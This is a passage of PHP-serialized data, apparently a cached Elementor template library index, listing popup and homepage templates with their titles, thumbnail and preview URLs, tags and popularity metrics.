mode\"]\";s:10:\"menu_order\";s:2:\"52\";s:16:\"popularity_index\";s:3:\"598\";s:11:\"trend_index\";s:3:\"322\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:462;a:14:{s:2:\"id\";s:5:\"10005\";s:5:\"title\";s:38:\"Fly In | Promotion | Spa | Body Lotion\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/01/Flyin_lotion_small.png\";s:12:\"tmpl_created\";s:10:\"1547844909\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/fly-in-promotion-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"54\";s:16:\"popularity_index\";s:3:\"572\";s:11:\"trend_index\";s:3:\"573\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:463;a:14:{s:2:\"id\";s:5:\"10424\";s:5:\"title\";s:21:\"Fly In | Announcement\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/flower_small.png\";s:12:\"tmpl_created\";s:10:\"1547961866\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/fly-in-announcement-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"55\";s:16:\"popularity_index\";s:3:\"504\";s:11:\"trend_index\";s:3:\"581\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:464;a:14:{s:2:\"id\";s:4:\"9975\";s:5:\"title\";s:24:\"Fly In | Promotion | App\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2019/01/flyin_webinar_app_small.png\";s:12:\"tmpl_created\";s:10:\"1547842284\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/popups/fly-in-promotion-webinar/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"55\";s:16:\"popularity_index\";s:3:\"590\";s:11:\"trend_index\";s:3:\"553\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:465;a:14:{s:2:\"id\";s:5:\"10067\";s:5:\"title\";s:31:\"Fly In | Announcement | Cookies\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2019/01/fly-in_cookie_yellow_small.png\";s:12:\"tmpl_created\";s:10:\"1547848075\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/fly-in-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"56\";s:16:\"popularity_index\";s:3:\"485\";s:11:\"trend_index\";s:3:\"583\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:466;a:14:{s:2:\"id\";s:5:\"10329\";s:5:\"title\";s:25:\"Fly In | Sale | Promotion\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/01/organic_small.png\";s:12:\"tmpl_created\";s:10:\"1547893478\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/fly-in-sale-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"59\";s:16:\"popularity_index\";s:3:\"594\";s:11:\"trend_index\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:467;a:14:{s:2:\"id\";s:4:\"9650\";s:5:\"title\";s:36:\"Fly In | Register | Subscribe | Sale\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2019/01/Fly-In_Register_small_01a.png\";s:12:\"tmpl_created\";s:10:\"1547007598\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/popups/fly-in-register_big-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"60\";s:16:\"popularity_index\";s:3:\"585\";s:11:\"trend_index\";s:3:\"597\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:468;a:14:{s:2:\"id\";s:5:\"10200\";s:5:\"title\";s:33:\"Full Screen | Content Lock | Wine\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2019/01/lock_wine_small.png\";s:12:\"tmpl_created\";s:10:\"1548055635\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/popups/full-screen-content-lock/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"63\";s:16:\"popularity_index\";s:3:\"564\";s:11:\"trend_index\";s:3:\"593\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:469;a:14:{s:2:\"id\";s:5:\"11981\";s:5:\"title\";s:18:\"Maintenance mode 6\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/10/mm6.png\";s:12:\"tmpl_created\";s:10:\"1572155125\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";s:2:\"63\";s:16:\"popularity_index\";s:3:\"593\";s:11:\"trend_index\";s:3:\"308\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:470;a:14:{s:2:\"id\";s:5:\"10287\";s:5:\"title\";s:34:\"Full Screen | Register | Subscribe\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/01/glass_pink_small.png\";s:12:\"tmpl_created\";s:10:\"1547994301\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/full-screen-login-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"64\";s:16:\"popularity_index\";s:3:\"493\";s:11:\"trend_index\";s:3:\"471\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:471;a:14:{s:2:\"id\";s:4:\"9889\";s:5:\"title\";s:28:\"Full Screen | Login | Cactus\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/cac_small.png\";s:12:\"tmpl_created\";s:10:\"1547838722\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/popups/full-screen-login/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"66\";s:16:\"popularity_index\";s:3:\"574\";s:11:\"trend_index\";s:3:\"578\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:472;a:14:{s:2:\"id\";s:3:\"147\";s:5:\"title\";s:20:\"Homepage &#8211; App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0004.png\";s:12:\"tmpl_created\";s:10:\"1470829868\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/homepage-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"App\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"67\";s:16:\"popularity_index\";s:1:\"1\";s:11:\"trend_index\";s:1:\"9\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:473;a:14:{s:2:\"id\";s:5:\"10077\";s:5:\"title\";s:29:\"Fly In | Register | Subscribe\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2019/01/flyin_register_blue_small.png\";s:12:\"tmpl_created\";s:10:\"1547848197\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/fly-in-register-subscribe/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"67\";s:16:\"popularity_index\";s:3:\"451\";s:11:\"trend_index\";s:3:\"422\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:474;a:14:{s:2:\"id\";s:3:\"777\";s:5:\"title\";s:28:\"Homepage &#8211; Coffee Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/01/rest-home.jpg\";s:12:\"tmpl_created\";s:10:\"1485273092\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/homepage-coffee-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:41:\"[\"Coffee\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";s:2:\"68\";s:16:\"popularity_index\";s:3:\"110\";s:11:\"trend_index\";s:3:\"257\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:475;a:14:{s:2:\"id\";s:5:\"10362\";s:5:\"title\";s:32:\"Full Screen | Login | Restaurant\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/vip_small.png\";s:12:\"tmpl_created\";s:10:\"1548056253\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/full-screen-login-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"69\";s:16:\"popularity_index\";s:3:\"510\";s:11:\"trend_index\";s:3:\"552\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:476;a:14:{s:2:\"id\";s:4:\"2404\";s:5:\"title\";s:24:\"Homepage &#8211; Product\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/09/product.png\";s:12:\"tmpl_created\";s:10:\"1506441452\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-product/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:103:\"[\"business\",\"colorful\",\"ecommerce\",\"flat\",\"mobile\",\"modern\",\"responsive\",\"retina\",\"Shop\",\"woocommerce\"]\";s:10:\"menu_order\";s:2:\"69\";s:16:\"popularity_index\";s:3:\"111\";s:11:\"trend_index\";s:3:\"260\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:477;a:14:{s:2:\"id\";s:3:\"492\";s:5:\"title\";s:25:\"Homepage &#8211; Law firm\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0024.png\";s:12:\"tmpl_created\";s:10:\"1477388365\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-law-firm/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"Firm\",\"Homepage\",\"Law\"]\";s:10:\"menu_order\";s:2:\"70\";s:16:\"popularity_index\";s:1:\"9\";s:11:\"trend_index\";s:2:\"34\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:478;a:14:{s:2:\"id\";s:5:\"10454\";s:5:\"title\";s:29:\"Full Screen | Promotion | App\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/appy_small.png\";s:12:\"tmpl_created\";s:10:\"1548056896\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/full-screen-promotion-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"71\";s:16:\"popularity_index\";s:3:\"589\";s:11:\"trend_index\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:479;a:14:{s:2:\"id\";s:4:\"3451\";s:5:\"title\";s:39:\"Homepage &#8211; Goodness meal services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/11/goodness-featured-image.png\";s:12:\"tmpl_created\";s:10:\"1512054116\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/homepage-goodness-meal-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"71\";s:16:\"popularity_index\";s:3:\"178\";s:11:\"trend_index\";s:3:\"329\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:480;a:14:{s:2:\"id\";s:4:\"2152\";s:5:\"title\";s:26:\"Homepage &#8211; Cake Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-home.png\";s:12:\"tmpl_created\";s:10:\"1499774132\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/homepage-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Cake\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";s:2:\"72\";s:16:\"popularity_index\";s:3:\"282\";s:11:\"trend_index\";s:3:\"478\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:481;a:14:{s:2:\"id\";s:4:\"9803\";s:5:\"title\";s:41:\"Full Screen | Register | Contact | Meetup\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2019/01/designme_full_small.png\";s:12:\"tmpl_created\";s:10:\"1547831298\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/full-screen-register-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"72\";s:16:\"popularity_index\";s:3:\"539\";s:11:\"trend_index\";s:3:\"572\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:482;a:14:{s:2:\"id\";s:5:\"10611\";s:5:\"title\";s:18:\"Full Screen | Sale\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/fla_small.png\";s:12:\"tmpl_created\";s:10:\"1547968868\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/popups/full-screen-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"73\";s:16:\"popularity_index\";s:3:\"588\";s:11:\"trend_index\";s:3:\"596\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:483;a:14:{s:2:\"id\";s:4:\"1068\";s:5:\"title\";s:27:\"Homepage &#8211; Copywriter\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/copywriter.png\";s:12:\"tmpl_created\";s:10:\"1488805928\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-copywriter/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"Copywriter\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"73\";s:16:\"popularity_index\";s:3:\"167\";s:11:\"trend_index\";s:3:\"364\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:484;a:14:{s:2:\"id\";s:4:\"2813\";s:5:\"title\";s:32:\"Homepage &#8211; Creative Agency\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2017/11/Creative-Agency-â€“-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1509615049\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-creative-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"74\";s:16:\"popularity_index\";s:2:\"80\";s:11:\"trend_index\";s:3:\"190\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:485;a:14:{s:2:\"id\";s:5:\"10508\";s:5:\"title\";s:25:\"Full Screen | Welcome Mat\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/hand_small-1.png\";s:12:\"tmpl_created\";s:10:\"1547964711\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/full-screen-welcome-mat-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"75\";s:16:\"popularity_index\";s:3:\"547\";s:11:\"trend_index\";s:3:\"562\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:486;a:14:{s:2:\"id\";s:3:\"728\";s:5:\"title\";s:33:\"Homepage &#8211; Delivery Company\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/01/delivery-company-home-page.jpg\";s:12:\"tmpl_created\";s:10:\"1485269993\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/homepage-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Delivery\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"75\";s:16:\"popularity_index\";s:3:\"212\";s:11:\"trend_index\";s:3:\"347\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:487;a:14:{s:2:\"id\";s:4:\"2403\";s:5:\"title\";s:29:\"Homepage &#8211; Luxury Hotel\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/09/Hotel.png\";s:12:\"tmpl_created\";s:10:\"1506441428\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/homepage-luxury-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"76\";s:16:\"popularity_index\";s:3:\"208\";s:11:\"trend_index\";s:3:\"331\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:488;a:14:{s:2:\"id\";s:4:\"9934\";s:5:\"title\";s:38:\"Full Screen | Welcome Mat | Teddy Bear\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2019/01/full_mat_teddy_small.png\";s:12:\"tmpl_created\";s:10:\"1547841787\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/popups/full-screen-welcome-mat/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"76\";s:16:\"popularity_index\";s:3:\"525\";s:11:\"trend_index\";s:3:\"604\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:489;a:14:{s:2:\"id\";s:4:\"1903\";s:5:\"title\";s:20:\"One Page &#8211; Spa\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2017/06/spa.png\";s:12:\"tmpl_created\";s:10:\"1496822325\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/one-page-spa/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:132:\"[\"beauty\",\"care\",\"girly\",\"hair\",\"Health\",\"hospitality\",\"massage\",\"medical\",\"parlor\",\"physiotherapy\",\"salon\",\"spa\",\"wellness\",\"yoga\"]\";s:10:\"menu_order\";s:2:\"77\";s:16:\"popularity_index\";s:3:\"154\";s:11:\"trend_index\";s:3:\"165\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:490;a:14:{s:2:\"id\";s:4:\"2123\";s:5:\"title\";s:33:\"One Page &#8211; Architect Office\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/06/architect.png\";s:12:\"tmpl_created\";s:10:\"1499772989\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/one-page-architect-office/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"78\";s:16:\"popularity_index\";s:2:\"10\";s:11:\"trend_index\";s:2:\"13\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:491;a:14:{s:2:\"id\";s:4:\"9709\";s:5:\"title\";s:25:\"Full Screen | Welcome Mat\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2019/01/Full-Screen_Welcome-Mat_01_small-1.png\";s:12:\"tmpl_created\";s:10:\"1547023834\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/full-screen-welcome-mat-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"78\";s:16:\"popularity_index\";s:3:\"561\";s:11:\"trend_index\";s:3:\"592\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:492;a:14:{s:2:\"id\";s:4:\"1888\";s:5:\"title\";s:32:\"One Page &#8211; Creative Meetup\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2017/06/creative-meetup.png\";s:12:\"tmpl_created\";s:10:\"1496822319\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/one-page-creative-meetup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"79\";s:16:\"popularity_index\";s:3:\"207\";s:11:\"trend_index\";s:3:\"392\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:493;a:14:{s:2:\"id\";s:4:\"9671\";s:5:\"title\";s:34:\"Hello Bar | Announcement | Cookies\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2019/01/Top-Bar_Announcement_small_01.png\";s:12:\"tmpl_created\";s:10:\"1547010259\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/hello-bar-announcement-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"79\";s:16:\"popularity_index\";s:3:\"517\";s:11:\"trend_index\";s:3:\"550\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:494;a:14:{s:2:\"id\";s:5:\"10234\";s:5:\"title\";s:38:\"Hello Bar | Announcement | Maintenance\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/pink_small.png\";s:12:\"tmpl_created\";s:10:\"1548055049\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/popups/hello-bar-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"80\";s:16:\"popularity_index\";s:3:\"581\";s:11:\"trend_index\";s:3:\"598\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:495;a:14:{s:2:\"id\";s:4:\"1891\";s:5:\"title\";s:35:\"One Page &#8211; Textile Convention\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/06/textile-meetup.png\";s:12:\"tmpl_created\";s:10:\"1496822323\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/one-page-textile-convention/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"80\";s:16:\"popularity_index\";s:3:\"348\";s:11:\"trend_index\";s:3:\"484\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:496;a:14:{s:2:\"id\";s:4:\"1880\";s:5:\"title\";s:24:\"One Page &#8211; Wedding\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/06/wedding.png\";s:12:\"tmpl_created\";s:10:\"1496822317\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/one-page-wedding/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"bride\",\"ceremony\",\"cute\",\"event\",\"fancy\",\"girly\",\"groom\",\"guestbook\",\"marriage\"]\";s:10:\"menu_order\";s:2:\"81\";s:16:\"popularity_index\";s:3:\"371\";s:11:\"trend_index\";s:3:\"489\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:497;a:14:{s:2:\"id\";s:4:\"1885\";s:5:\"title\";s:29:\"One Page &#8211; Yacht Rental\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/06/yacht-home.png\";s:12:\"tmpl_created\";s:10:\"1496822321\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/one-page-yacht-rental/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"82\";s:16:\"popularity_index\";s:3:\"168\";s:11:\"trend_index\";s:3:\"303\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:498;a:14:{s:2:\"id\";s:4:\"2723\";s:5:\"title\";s:34:\"Portfolio &#8211; Graphic 